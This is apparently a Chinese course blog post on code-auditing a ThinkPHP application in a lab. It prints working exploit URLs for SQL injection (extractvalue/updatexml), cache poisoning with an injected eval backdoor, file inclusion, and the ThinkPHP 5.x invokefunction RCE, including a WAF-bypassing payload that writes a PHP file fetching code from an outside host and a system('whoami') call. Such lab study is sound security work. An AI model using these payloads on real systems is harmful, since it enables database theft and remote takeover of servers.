当前位置: 首页 > article >正文

DAY113代码审计-PHPTP框架微P系统漏审项目等

一、环境安装

导入数据

Debug

版本信息收集

一、不安全写法的sql注入(拼接写法绕过预编译机制)

1、Good.php的不安全写法

2、查找可以参数

3、找路由关系

application/index/controller/Goods.php

http://172.19.1.236:8833/index.php/index/goods/ajaxkdata/pid/6 and(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))%23

application/common.php

二、版本漏洞

1、5.x全版本的sql漏洞

http://172.19.1.236:8833/index.php/index/xiaodi/test?username=) union select updatexml(1,concat(0x7,user(),0x7e),1)%23

产品未找到该用法

2、文件包含

渲染页面值

http://172.19.1.236:8833/index.php/index/xiaodi/include_test?cacheFile=1.html

页面渲染

3、缓存漏洞

http://172.19.1.236:8833/index.php/index/xiaodi/index?username=mochazz123%0d%0a@eval($_GET[_]);//*

4、命令执行

waf对eval进行了拦截

禁止了assert函数对eval函数后面的括号进行了正则过滤

对file\_get\_contents函数后面的括号进行了正则过滤

    http://www.0-sec.org/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][1]=<?php /*1111*//***/file_put_contents/*1**/(/***/'index11.php'/**/,file_get_contents(/**/'https://www.hack.com/xxx.js'))/**/;/**/?>

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

5、xss漏洞

用户名存在xss

6、验证登录token值固定


http://www.kler.cn/a/392822.html

相关文章:

  • Could not initialize class sun.awt.X11FontManager
  • 容器技术在DevOps中的应用
  • DataWorks on EMR StarRocks,打造标准湖仓新范式
  • LeetCode【0031】下一个排列
  • Qt 实现文件监控程序
  • 编译ffmpeg动态库时设置RPATH为$ORIGIN
  • 初识机器学习
  • vue el-date-picker 日期选择 回显后成功后无法改变的解决办法
  • 2024年9月青少年软件编程(C语言/C++)等级考试试卷(九级)
  • Kafka基础知识学习
  • Spring Boot编程训练系统:数据管理与存储
  • Leetcode刷题笔记14
  • 时序预测:多头注意力+宽度学习
  • 2 C++ 基本内置类型
  • Vulnhub靶场案例渗透[8]- HackableII
  • 更换电脑 重新安装软件
  • 前端基础的讲解-JS(11)
  • 磁盘的物理组成(Linux网络服务器 15)
  • Kafka--关于broker的夺命连环问
  • 半导体企业如何利用 Jira 应对复杂商业变局?
  • C++进阶-->封装map和set
  • deeponet作者相关三篇论文链接(理论基础、实用拓展、外推)
  • lmod安装和使用
  • 12 go语言(golang) - 数据类型:接口
  • C++ 优先算法 —— 四数之和(双指针)
  • 二、深度学习_基本概念笔记